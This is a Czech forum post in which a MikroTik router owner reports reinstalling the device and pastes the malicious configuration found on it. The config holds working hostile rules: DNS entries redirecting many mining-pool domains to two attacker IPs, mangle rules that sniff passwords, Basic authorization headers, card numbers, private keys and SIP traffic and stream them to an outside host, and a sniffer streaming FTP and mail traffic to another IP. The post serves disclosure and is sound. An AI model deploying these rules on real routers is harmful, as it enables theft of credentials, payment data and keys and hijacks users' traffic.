Dobrý den,
provedl jsem netinstall a vše již funguje jak má. Vypnul jsem services, které nepoužívám z důvodu bezpečnosti. Po 10min již někdo ťukal na vrátka viz. screen.
Před netinstallem jsem exportoval config do .rsc. Objevil jsem tam bakterii, která pravděpodobně těžila bitcoin a ethereum. Pak z netu na můj RB útočil jiný MikroTik a snažil se mi dostat do RB.
Config:
/ip dns static
add address=185.205.210.23 name=asia1.ethermine.org
add address=185.205.210.23 name=asia1.ethpool.org
add address=185.205.210.23 name=asia1.fullhashed.com
add address=185.205.210.23 name=asia2.ethermine.org
add address=185.205.210.23 name=cn.sparkpool.com
add address=185.205.210.23 name=aurorapool.net
add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com
add address=185.205.210.23 name=coinotron.com
add address=185.205.210.23 name=eth.1stpool.com
add address=185.205.210.23 name=eth.anorak.tech
add address=185.205.210.23 name=eth.2miners.com
add address=185.205.210.23 name=eth.antpool.com
add address=185.205.210.23 name=eth-ar.dwarfpool.com
add address=185.205.210.23 name=eth.arsmine.net
add address=185.205.210.23 name=eth-as.coinmine.pl
add address=185.205.210.23 name=eth-asia1.nanopool.org
add address=185.205.210.23 name=eth-br.dwarfpool.com
add address=185.205.210.23 name=eth.chileminers.cl
add address=185.205.210.23 name=eth.coinfoundry.org
add address=185.205.210.23 name=eth.coinmine.pl
add address=185.205.210.23 name=ethepool.com
add address=185.205.210.23 name=ether.bw.com
add address=185.205.210.23 name=etherdig.net
add address=185.205.210.23 name=ethereum.marshsoftware.ca
add address=185.205.210.23 name=ethereumpool.club
add address=185.205.210.23 name=ethergrab.us
add address=185.205.210.23 name=ethermine.ru
add address=185.205.210.23 name=ethertrench.com
add address=185.205.210.23 name=eth.ethertrench.com
add address=185.205.210.23 name=eth-eu1.nanopool.org
add address=185.205.210.23 name=eth-eu.coinmine.pl
add address=185.205.210.23 name=eth-eu.dwarfpool.com
add address=185.205.210.23 name=eth-eu.mining.sk
add address=185.205.210.23 name=eth-eu.pool.sexy
add address=185.205.210.23 name=eth.f2pool.com
add address=185.205.210.23 name=eth.gigantpool.com
add address=185.205.210.23 name=eth.gpumine.org
add address=185.205.210.23 name=eth-hk.dwarfpool.com
add address=185.205.210.23 name=eth.miningcity.org
add address=185.205.210.23 name=eth.mymininghub.com
add address=185.205.210.23 name=eth.pool.minergate.com
add address=185.205.210.23 name=eth.poolmining.org
add address=185.205.210.23 name=eth-pool.ucrypto.net
add address=185.205.210.23 name=eth.pool.zet-tech.eu
add address=185.205.210.23 name=eth-ru.dwarfpool.com
add address=185.205.210.23 name=eth-ru.edgestile.io
add address=185.205.210.23 name=eth-ru.mining.sk
add address=185.205.210.23 name=eth-sg.dwarfpool.com
add address=185.205.210.23 name=eth.soyminero.es
add address=185.205.210.23 name=eth.suprnova.cc
add address=185.205.210.23 name=eth.uleypool.com
add address=185.205.210.23 name=eth-us.coinmine.pl
add address=185.205.210.23 name=eth-us.dwarfpool.com
add address=185.205.210.23 name=eth-us-east1.nanopool.org
add address=185.205.210.23 name=eth-us.maxhash.org
add address=185.205.210.23 name=eth-us.pool.sexy
add address=185.205.210.23 name=eth-us-west1.nanopool.org
add address=185.205.210.23 name=eth.waterhole.io
add address=185.205.210.23 name=eth.xeminer.net
add address=185.205.210.23 name=eth.zion.net.co
add address=185.205.210.23 name=eu1.ethermine.org
add address=185.205.210.23 name=eu1.ethpool.org
add address=185.205.210.23 name=eu2.ethermine.org
add address=185.205.210.23 name=eu.99miners.com
add address=185.205.210.23 name=eu.ethmine.club
add address=185.205.210.23 name=eu.sparkpool.com
add address=185.205.210.23 name=huabei2-pool.ethfans.org
add address=185.205.210.23 name=huabei-pool.ethfans.org
add address=185.205.210.23 name=miningcity.org
add address=185.205.210.23 name=my.ethpool.net
add address=185.205.210.23 name=na-west.sparkpool.com
add address=185.205.210.23 name=na-east.sparkpool.com
add address=185.205.210.23 name=noobpool.com
add address=185.205.210.23 name=pool.ethfans.org
add address=185.205.210.23 name=pool.virtualmining.pt
add address=185.205.210.23 name=s.comining.io
add address=185.205.210.23 name=us1.ethermine.org
add address=185.205.210.23 name=us1.ethpool.org
add address=185.205.210.23 name=us2.ethermine.org
add address=185.205.210.23 name=us2.ethpool.org
add address=185.205.210.23 name=vaux-all.uk
add address=209.239.112.96 name=stratum.antpool.com
add address=209.239.112.96 name=stratum.slushpool.com
add address=209.239.112.96 name=asia1.ethermine.org
add address=209.239.112.96 name=cn.stratum.slushpool.com
add address=209.239.112.96 name=eu.stratum.slushpool.com
add address=209.239.112.96 name=asia1.ethpool.org
add address=209.239.112.96 name=jp-stratum.btcc.com
add address=209.239.112.96 name=asia1.fullhashed.com
add address=209.239.112.96 name=mint.bitminter.com
add address=209.239.112.96 name=asia2.ethermine.org
add address=209.239.112.96 name=us.ss.btc.com
add address=209.239.112.96 name=cn.sparkpool.com
add address=209.239.112.96 name=na-west.sparkpool.com
add address=209.239.112.96 name=na-east.sparkpool.com
add address=209.239.112.96 name=aurorapool.net
add address=209.239.112.96 name=tw.sparkpool.com
add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com
add address=209.239.112.96 name=kr.sparkpool.com
add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com
add address=209.239.112.96 name=jp.sparkpool.com
add address=209.239.112.96 name=bitcoin.viabtc.com
add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com
add address=209.239.112.96 name=stratum-us.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com
add address=209.239.112.96 name=stratum.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com
add address=209.239.112.96 name=stratum.btcguild.com
add address=209.239.112.96 name=stratum.btccpool.com
add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com
add address=209.239.112.96 name=stratum.btc.top
add address=209.239.112.96 name=coinotron.com
add address=209.239.112.96 name=eth.1stpool.com
add address=209.239.112.96 name=eth.anorak.tech
add address=209.239.112.96 name=eth.2miners.com
add address=209.239.112.96 name=eth.antpool.com
add address=209.239.112.96 name=eth-ar.dwarfpool.com
add address=209.239.112.96 name=eth.arsmine.net
add address=209.239.112.96 name=eth-as.coinmine.pl
add address=209.239.112.96 name=eth-asia1.nanopool.org
add address=209.239.112.96 name=eth-br.dwarfpool.com
add address=209.239.112.96 name=eth.chileminers.cl
add address=209.239.112.96 name=eth.coinfoundry.org
add address=209.239.112.96 name=eth.coinmine.pl
add address=209.239.112.96 name=ethepool.com
add address=209.239.112.96 name=ether.bw.com
add address=209.239.112.96 name=etherdig.net
add address=209.239.112.96 name=ethereum.marshsoftware.ca
add address=209.239.112.96 name=ethereumpool.club
add address=209.239.112.96 name=ethergrab.us
add address=209.239.112.96 name=ethermine.ru
add address=209.239.112.96 name=ethertrench.com
add address=209.239.112.96 name=eth.ethertrench.com
add address=209.239.112.96 name=eth-eu1.nanopool.org
add address=209.239.112.96 name=eth-eu.coinmine.pl
add address=209.239.112.96 name=eth-eu.dwarfpool.com
add address=209.239.112.96 name=eth-eu.mining.sk
add address=209.239.112.96 name=eth-eu.pool.sexy
add address=209.239.112.96 name=eth.f2pool.com
add address=209.239.112.96 name=eth.gigantpool.com
add address=209.239.112.96 name=eth.gpumine.org
add address=209.239.112.96 name=eth-hk.dwarfpool.com
add address=209.239.112.96 name=eth.miningcity.org
add address=209.239.112.96 name=eth.mymininghub.com
add address=209.239.112.96 name=eth.pool.minergate.com
add address=209.239.112.96 name=eth.poolmining.org
add address=209.239.112.96 name=eth-pool.ucrypto.net
add address=209.239.112.96 name=eth.pool.zet-tech.eu
add address=209.239.112.96 name=eth-ru.dwarfpool.com
add address=209.239.112.96 name=eth-ru.edgestile.io
add address=209.239.112.96 name=eth-ru.mining.sk
add address=209.239.112.96 name=eth-sg.dwarfpool.com
add address=209.239.112.96 name=eth.soyminero.es
add address=209.239.112.96 name=eth.suprnova.cc
add address=209.239.112.96 name=eth.uleypool.com
add address=209.239.112.96 name=eth-us.coinmine.pl
add address=209.239.112.96 name=eth-us.dwarfpool.com
add address=209.239.112.96 name=eth-us-east1.nanopool.org
add address=209.239.112.96 name=eth-us.maxhash.org
add address=209.239.112.96 name=eth-us.pool.sexy
add address=209.239.112.96 name=eth-us-west1.nanopool.org
add address=209.239.112.96 name=eth.waterhole.io
add address=209.239.112.96 name=eth.xeminer.net
add address=209.239.112.96 name=eth.zion.net.co
add address=209.239.112.96 name=eu1.ethermine.org
add address=209.239.112.96 name=eu1.ethpool.org
add address=209.239.112.96 name=eu2.ethermine.org
add address=209.239.112.96 name=eu.99miners.com
add address=209.239.112.96 name=eu.ethmine.club
add address=209.239.112.96 name=eu.sparkpool.com
add address=209.239.112.96 name=huabei2-pool.ethfans.org
add address=209.239.112.96 name=huabei-pool.ethfans.org
add address=209.239.112.96 name=miningcity.org
add address=209.239.112.96 name=my.ethpool.net
add address=209.239.112.96 name=noobpool.com
add address=209.239.112.96 name=pool.ethfans.org
add address=209.239.112.96 name=pool.virtualmining.pt
add address=209.239.112.96 name=s.comining.io
add address=209.239.112.96 name=us1.ethermine.org
add address=209.239.112.96 name=us1.ethpool.org
add address=209.239.112.96 name=us2.ethermine.org
add address=209.239.112.96 name=us2.ethpool.org
add address=209.239.112.96 name=vaux-all.uk
/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork \
new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \
content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=eth_submitWork \
new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting \
content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit \
new-connection-mark=Bitcoin
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \
content=mining.submit
add action=mark-connection chain=prerouting content=mining.submit \
new-connection-mark=Bitcoin
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting \
content=mining.submit
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=\
149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 \
sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" \
sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 \
sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=\
149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp \
sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp \
sniff-target=149.56.27.80 sniff-target-port=60003
/tool graphing interface
add
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
streaming-server=37.1.207.114
Mockrát všem děkuji za rady.